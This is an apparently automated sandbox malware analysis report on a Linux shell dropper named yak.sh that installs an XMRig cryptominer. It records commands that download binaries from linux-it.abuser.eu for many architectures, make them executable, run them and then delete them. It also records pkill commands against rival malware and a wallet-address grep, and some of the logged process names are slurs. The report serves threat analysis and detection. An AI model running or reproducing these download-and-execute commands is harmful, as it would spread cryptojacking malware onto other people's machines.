Malware Analysis Report

2025-01-02 07:01

Sample ID 241124-aamklszlcn
Target yak.sh
SHA256 ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf
Tags
defense_evasion discovery antivm xmrig xmrig_linux miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf

Threat Level: Known bad

The file yak.sh was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery antivm xmrig xmrig_linux miner

xmrig

xmrig

Xmrig_linux family

Xmrig family

XMRig Miner payload

Executes dropped EXE

File and Directory Permissions Modification

Enumerates running processes

Checks CPU configuration

Reads CPU attributes

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-24 00:00

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-24 00:00

Reported

2024-11-24 00:03

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

148s

Max time network

132s

Command Line

[/tmp/yak.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/yakuza.mips N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/yakuza.mipsel N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Processes

/tmp/yak.sh

[/tmp/yak.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mips]

/bin/chmod

[chmod +x yakuza.mips]

/tmp/yakuza.mips

[./yakuza.mips]

/bin/rm

[rm -rf yakuza.mips]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mipsel]

/bin/chmod

[chmod +x yakuza.mipsel]

/tmp/yakuza.mipsel

[./yakuza.mipsel]

/bin/rm

[rm -rf yakuza.mipsel]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sh]

/bin/chmod

[chmod +x yakuza.sh]

/tmp/yakuza.sh

[./yakuza.sh]

/bin/rm

[rm -rf yakuza.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.x86]

/bin/chmod

[chmod +x yakuza.x86]

/tmp/yakuza.x86

[./yakuza.x86]

/bin/rm

[rm -rf yakuza.x86]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm6]

/bin/chmod

[chmod +x yakuza.arm6]

/tmp/yakuza.arm6

[./yakuza.arm6]

/bin/rm

[rm -rf yakuza.arm6]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i686]

/bin/chmod

[chmod +x yakuza.i686]

/tmp/yakuza.i686

[./yakuza.i686]

/bin/rm

[rm -rf yakuza.i686]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.ppc]

/bin/chmod

[chmod +x yakuza.ppc]

/tmp/yakuza.ppc

[./yakuza.ppc]

/bin/rm

[rm -rf yakuza.ppc]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i586]

/bin/chmod

[chmod +x yakuza.i586]

/tmp/yakuza.i586

[./yakuza.i586]

/bin/rm

[rm -rf yakuza.i586]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.m68k]

/bin/chmod

[chmod +x yakuza.m68k]

/tmp/yakuza.m68k

[./yakuza.m68k]

/bin/rm

[rm -rf yakuza.m68k]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm4]

/bin/chmod

[chmod +x yakuza.arm4]

/tmp/yakuza.arm4

[./yakuza.arm4]

/bin/rm

[rm -rf yakuza.arm4]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm5]

/bin/chmod

[chmod +x yakuza.arm5]

/tmp/yakuza.arm5

[./yakuza.arm5]

/bin/rm

[rm -rf yakuza.arm5]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm7]

/bin/chmod

[chmod +x yakuza.arm7]

/tmp/yakuza.arm7

[./yakuza.arm7]

/bin/rm

[rm -rf yakuza.arm7]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sparc]

/bin/chmod

[chmod +x yakuza.sparc]

/tmp/yakuza.sparc

[./yakuza.sparc]

/bin/rm

[rm -rf yakuza.sparc]

/bin/bash

[bash]

/usr/bin/curl

[curl -s http://linux-it.abuser.eu/test.php]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 151.101.193.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.7:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.8:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-24 00:00

Reported

2024-11-24 00:03

Platform

debian9-armhf-20240729-en

Max time kernel

149s

Max time network

7s

Command Line

[/tmp/yak.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/yakuza.mipsel N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/yakuza.mips N/A

Processes

/tmp/yak.sh

[/tmp/yak.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mips]

/bin/chmod

[chmod +x yakuza.mips]

/tmp/yakuza.mips

[./yakuza.mips]

/bin/rm

[rm -rf yakuza.mips]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mipsel]

/bin/chmod

[chmod +x yakuza.mipsel]

/tmp/yakuza.mipsel

[./yakuza.mipsel]

/bin/rm

[rm -rf yakuza.mipsel]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sh]

/bin/chmod

[chmod +x yakuza.sh]

/tmp/yakuza.sh

[./yakuza.sh]

/bin/rm

[rm -rf yakuza.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.x86]

/bin/chmod

[chmod +x yakuza.x86]

/tmp/yakuza.x86

[./yakuza.x86]

/bin/rm

[rm -rf yakuza.x86]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm6]

/bin/chmod

[chmod +x yakuza.arm6]

/tmp/yakuza.arm6

[./yakuza.arm6]

/bin/rm

[rm -rf yakuza.arm6]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i686]

/bin/chmod

[chmod +x yakuza.i686]

/tmp/yakuza.i686

[./yakuza.i686]

/bin/rm

[rm -rf yakuza.i686]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.ppc]

/bin/chmod

[chmod +x yakuza.ppc]

/tmp/yakuza.ppc

[./yakuza.ppc]

/bin/rm

[rm -rf yakuza.ppc]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i586]

/bin/chmod

[chmod +x yakuza.i586]

/tmp/yakuza.i586

[./yakuza.i586]

/bin/rm

[rm -rf yakuza.i586]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.m68k]

/bin/chmod

[chmod +x yakuza.m68k]

/tmp/yakuza.m68k

[./yakuza.m68k]

/bin/rm

[rm -rf yakuza.m68k]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm4]

/bin/chmod

[chmod +x yakuza.arm4]

/tmp/yakuza.arm4

[./yakuza.arm4]

/bin/rm

[rm -rf yakuza.arm4]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm5]

/bin/chmod

[chmod +x yakuza.arm5]

/tmp/yakuza.arm5

[./yakuza.arm5]

/bin/rm

[rm -rf yakuza.arm5]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm7]

/bin/chmod

[chmod +x yakuza.arm7]

/tmp/yakuza.arm7

[./yakuza.arm7]

/bin/rm

[rm -rf yakuza.arm7]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sparc]

/bin/chmod

[chmod +x yakuza.sparc]

/tmp/yakuza.sparc

[./yakuza.sparc]

/bin/rm

[rm -rf yakuza.sparc]

/usr/bin/curl

[curl -s http://linux-it.abuser.eu/test.php]

/bin/bash

[bash]

Network

Country Destination Domain Proto
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp

Files

memory/713-1-0xb673e000-0xb674f044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-24 00:00

Reported

2024-11-24 00:03

Platform

debian9-mipsbe-20240611-en

Max time kernel

149s

Max time network

151s

Command Line

[/tmp/yak.sh]

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig_linux

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/yakuza.mips /tmp/yakuza.mips N/A
N/A /tmp/xmrig /tmp/xmrig N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/70/status /usr/bin/pkill N/A
File opened for reading /proc/82/cmdline /usr/bin/pkill N/A
File opened for reading /proc/154/status /usr/bin/pkill N/A
File opened for reading /proc/15/status /usr/bin/pkill N/A
File opened for reading /proc/357/cmdline /usr/bin/pkill N/A
File opened for reading /proc/14/cmdline /usr/bin/pkill N/A
File opened for reading /proc/171/status /usr/bin/pkill N/A
File opened for reading /proc/111/cmdline /usr/bin/pkill N/A
File opened for reading /proc/154/cmdline /usr/bin/pkill N/A
File opened for reading /proc/725/status /usr/bin/pkill N/A
File opened for reading /proc/10/status /usr/bin/pkill N/A
File opened for reading /proc/665/cmdline /usr/bin/pkill N/A
File opened for reading /proc/36/status /usr/bin/pkill N/A
File opened for reading /proc/5/cmdline /usr/bin/pkill N/A
File opened for reading /proc/75/cmdline /usr/bin/pkill N/A
File opened for reading /proc/725/cmdline /usr/bin/pkill N/A
File opened for reading /proc/74/status /usr/bin/pkill N/A
File opened for reading /proc/10/status /usr/bin/pkill N/A
File opened for reading /proc/14/cmdline /usr/bin/pkill N/A
File opened for reading /proc/7/status /usr/bin/pkill N/A
File opened for reading /proc/16/cmdline /usr/bin/pkill N/A
File opened for reading /proc/74/status /usr/bin/pkill N/A
File opened for reading /proc/664/status /usr/bin/pkill N/A
File opened for reading /proc/692/cmdline /usr/bin/pkill N/A
File opened for reading /proc/324/cmdline /usr/bin/pkill N/A
File opened for reading /proc/12/cmdline /usr/bin/pkill N/A
File opened for reading /proc/727/status /usr/bin/pkill N/A
File opened for reading /proc/693/cmdline /usr/bin/pkill N/A
File opened for reading /proc/121/status /usr/bin/pkill N/A
File opened for reading /proc/223/status /usr/bin/pkill N/A
File opened for reading /proc/691/cmdline /usr/bin/pkill N/A
File opened for reading /proc/356/status /usr/bin/pkill N/A
File opened for reading /proc/111/status /usr/bin/pkill N/A
File opened for reading /proc/5/status /usr/bin/pkill N/A
File opened for reading /proc/384/cmdline /usr/bin/pkill N/A
File opened for reading /proc/82/cmdline /usr/bin/pkill N/A
File opened for reading /proc/223/cmdline /usr/bin/pkill N/A
File opened for reading /proc/37/cmdline /usr/bin/pkill N/A
File opened for reading /proc/3/cmdline /bin/ps N/A
File opened for reading /proc/19/cmdline /usr/bin/pkill N/A
File opened for reading /proc/20/cmdline /usr/bin/pkill N/A
File opened for reading /proc/6/cmdline /usr/bin/pkill N/A
File opened for reading /proc/17/cmdline /usr/bin/pkill N/A
File opened for reading /proc/8/cmdline /usr/bin/pkill N/A
File opened for reading /proc/17/status /usr/bin/pkill N/A
File opened for reading /proc/71/cmdline /usr/bin/pkill N/A
File opened for reading /proc/73/cmdline /usr/bin/pkill N/A
File opened for reading /proc/21/status /usr/bin/pkill N/A
File opened for reading /proc/727/status /usr/bin/pkill N/A
File opened for reading /proc/75/status /usr/bin/pkill N/A
File opened for reading /proc/11/cmdline /usr/bin/pkill N/A
File opened for reading /proc/11/cmdline /usr/bin/pkill N/A
File opened for reading /proc/5/cmdline /usr/bin/pkill N/A
File opened for reading /proc/692/status /usr/bin/pkill N/A
File opened for reading /proc/381/status /usr/bin/pkill N/A
File opened for reading /proc/36/status /usr/bin/pkill N/A
File opened for reading /proc/799/cmdline /usr/bin/pkill N/A
File opened for reading /proc/374/status /usr/bin/pkill N/A
File opened for reading /proc/357/cmdline /usr/bin/pkill N/A
File opened for reading /proc/665/status /usr/bin/pkill N/A
File opened for reading /proc/154/status /usr/bin/pkill N/A
File opened for reading /proc/150/cmdline /usr/bin/pkill N/A
File opened for reading /proc/686/cmdline /usr/bin/pkill N/A
File opened for reading /proc/691/status /usr/bin/pkill N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/yakuza.mipsel N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/sh N/A
N/A N/A /usr/bin/pkill N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/yakuza.mips N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/yakuza.sh /usr/bin/wget N/A
File opened for modification /tmp/yakuza.x86 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm7 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.mips /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm6 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.i586 /usr/bin/wget N/A
File opened for modification /tmp/xmrig /usr/bin/curl N/A
File opened for modification /tmp/yakuza.mipsel /usr/bin/wget N/A
File opened for modification /tmp/yakuza.i686 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm5 /usr/bin/wget N/A
File opened for modification /tmp/S�@@p�~@8 /bin/sh N/A
File opened for modification /tmp/yakuza.ppc /usr/bin/wget N/A
File opened for modification /tmp/yakuza.m68k /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm4 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.sparc /usr/bin/wget N/A

Processes

/tmp/yak.sh

[/tmp/yak.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mips]

/bin/chmod

[chmod +x yakuza.mips]

/tmp/yakuza.mips

[./yakuza.mips]

/bin/sh

[sh -c pkill -9 902i13 || busybox pkill -9 902i13]

/bin/rm

[rm -rf yakuza.mips]

/usr/bin/pkill

[pkill -9 902i13]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mipsel]

/bin/busybox

[busybox pkill -9 902i13]

/bin/sh

[sh -c pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY]

/usr/bin/pkill

[pkill -9 BzSxLxBxeY]

/bin/busybox

[busybox pkill -9 BzSxLxBxeY]

/bin/chmod

[chmod +x yakuza.mipsel]

/tmp/yakuza.mipsel

[./yakuza.mipsel]

/bin/sh

[sh -c pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7]

/usr/bin/pkill

[pkill -9 HOHO-LUGO7]

/bin/rm

[rm -rf yakuza.mipsel]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sh]

/bin/busybox

[busybox pkill -9 HOHO-LUGO7]

/bin/sh

[sh -c pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL]

/usr/bin/pkill

[pkill -9 HOHO-U79OL]

/bin/busybox

[busybox pkill -9 HOHO-U79OL]

/bin/sh

[sh -c pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87]

/usr/bin/pkill

[pkill -9 JuYfouyf87]

/bin/chmod

[chmod +x yakuza.sh]

/bin/busybox

[busybox pkill -9 JuYfouyf87]

/tmp/yakuza.sh

[./yakuza.sh]

/bin/rm

[rm -rf yakuza.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.x86]

/bin/sh

[sh -c pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd]

/usr/bin/pkill

[pkill -9 NiGGeR69xd]

/bin/busybox

[busybox pkill -9 NiGGeR69xd]

/bin/sh

[sh -c pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X]

/usr/bin/pkill

[pkill -9 SO190Ij1X]

/bin/chmod

[chmod +x yakuza.x86]

/bin/busybox

[busybox pkill -9 SO190Ij1X]

/tmp/yakuza.x86

[./yakuza.x86]

/bin/rm

[rm -rf yakuza.x86]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm6]

/bin/sh

[sh -c pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE]

/usr/bin/pkill

[pkill -9 LOLKIKEEEDDE]

/bin/busybox

[busybox pkill -9 LOLKIKEEEDDE]

/bin/sh

[sh -c pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e]

/usr/bin/pkill

[pkill -9 ekjheory98e]

/bin/chmod

[chmod +x yakuza.arm6]

/tmp/yakuza.arm6

[./yakuza.arm6]

/bin/busybox

[busybox pkill -9 ekjheory98e]

/bin/rm

[rm -rf yakuza.arm6]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i686]

/bin/sh

[sh -c pkill -9 scansh4 || busybox pkill -9 scansh4]

/usr/bin/pkill

[pkill -9 scansh4]

/bin/busybox

[busybox pkill -9 scansh4]

/bin/chmod

[chmod +x yakuza.i686]

/tmp/yakuza.i686

[./yakuza.i686]

/bin/sh

[sh -c pkill -9 MDMA || busybox pkill -9 MDMA]

/usr/bin/pkill

[pkill -9 MDMA]

/bin/rm

[rm -rf yakuza.i686]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.ppc]

/bin/busybox

[busybox pkill -9 MDMA]

/bin/sh

[sh -c pkill -9 fdevalvex || busybox pkill -9 fdevalvex]

/usr/bin/pkill

[pkill -9 fdevalvex]

/bin/busybox

[busybox pkill -9 fdevalvex]

/bin/chmod

[chmod +x yakuza.ppc]

/tmp/yakuza.ppc

[./yakuza.ppc]

/bin/rm

[rm -rf yakuza.ppc]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i586]

/bin/sh

[sh -c pkill -9 scanspc || busybox pkill -9 scanspc]

/usr/bin/pkill

[pkill -9 scanspc]

/bin/busybox

[busybox pkill -9 scanspc]

/bin/sh

[sh -c pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ]

/usr/bin/pkill

[pkill -9 MELTEDNINJAREALZ]

/bin/busybox

[busybox pkill -9 MELTEDNINJAREALZ]

/bin/chmod

[chmod +x yakuza.i586]

/tmp/yakuza.i586

[./yakuza.i586]

/bin/rm

[rm -rf yakuza.i586]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.m68k]

/bin/sh

[sh -c pkill -9 flexsonskids || busybox pkill -9 flexsonskids]

/usr/bin/pkill

[pkill -9 flexsonskids]

/bin/busybox

[busybox pkill -9 flexsonskids]

/bin/sh

[sh -c pkill -9 scanx86 || busybox pkill -9 scanx86]

/usr/bin/pkill

[pkill -9 scanx86]

/bin/busybox

[busybox pkill -9 scanx86]

/bin/chmod

[chmod +x yakuza.m68k]

/tmp/yakuza.m68k

[./yakuza.m68k]

/bin/rm

[rm -rf yakuza.m68k]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm4]

/bin/sh

[sh -c pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL]

/usr/bin/pkill

[pkill -9 MISAKI-U79OL]

/bin/busybox

[busybox pkill -9 MISAKI-U79OL]

/bin/sh

[sh -c pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe]

/usr/bin/pkill

[pkill -9 foAxi102kxe]

/bin/busybox

[busybox pkill -9 foAxi102kxe]

/bin/sh

[sh -c pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj]

/usr/bin/pkill

[pkill -9 swodjwodjwoj]

/bin/busybox

[busybox pkill -9 swodjwodjwoj]

/bin/sh

[sh -c pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l]

/usr/bin/pkill

[pkill -9 MmKiy7f87l]

/bin/busybox

[busybox pkill -9 MmKiy7f87l]

/bin/chmod

[chmod +x yakuza.arm4]

/tmp/yakuza.arm4

[./yakuza.arm4]

/bin/rm

[rm -rf yakuza.arm4]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm5]

/bin/sh

[sh -c pkill -9 freecookiex86 || busybox pkill -9 freecookiex86]

/usr/bin/pkill

[pkill -9 freecookiex86]

/bin/busybox

[busybox pkill -9 freecookiex86]

/bin/chmod

[chmod +x yakuza.arm5]

/tmp/yakuza.arm5

[./yakuza.arm5]

/bin/rm

[rm -rf yakuza.arm5]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm7]

/bin/sh

[sh -c pkill -9 sysgpu || busybox pkill -9 sysgpu]

/usr/bin/pkill

[pkill -9 sysgpu]

/bin/busybox

[busybox pkill -9 sysgpu]

/bin/sh

[sh -c pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd]

/usr/bin/pkill

[pkill -9 NiGGeR69xd]

/bin/busybox

[busybox pkill -9 NiGGeR69xd]

/bin/chmod

[chmod +x yakuza.arm7]

/tmp/yakuza.arm7

[./yakuza.arm7]

/bin/rm

[rm -rf yakuza.arm7]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sparc]

/bin/sh

[sh -c pkill -9 frgege || busybox pkill -9 frgege]

/usr/bin/pkill

[pkill -9 frgege]

/bin/busybox

[busybox pkill -9 frgege]

/bin/chmod

[chmod +x yakuza.sparc]

/tmp/yakuza.sparc

[./yakuza.sparc]

/bin/rm

[rm -rf yakuza.sparc]

/bin/bash

[bash]

/usr/bin/curl

[curl -s http://linux-it.abuser.eu/test.php]

/bin/sh

[sh -c pkill -9 sysupdater || busybox pkill -9 sysupdater]

/usr/bin/pkill

[pkill -9 sysupdater]

/bin/busybox

[busybox pkill -9 sysupdater]

/bin/grep

[grep xmrig]

/bin/grep

[grep -v grep]

/bin/ps

[ps x]

/bin/grep

[grep 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW]

/bin/sh

[sh -c pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd]

/usr/bin/pkill

[pkill -9 0DnAzepd]

/bin/busybox

[busybox pkill -9 0DnAzepd]

/usr/bin/curl

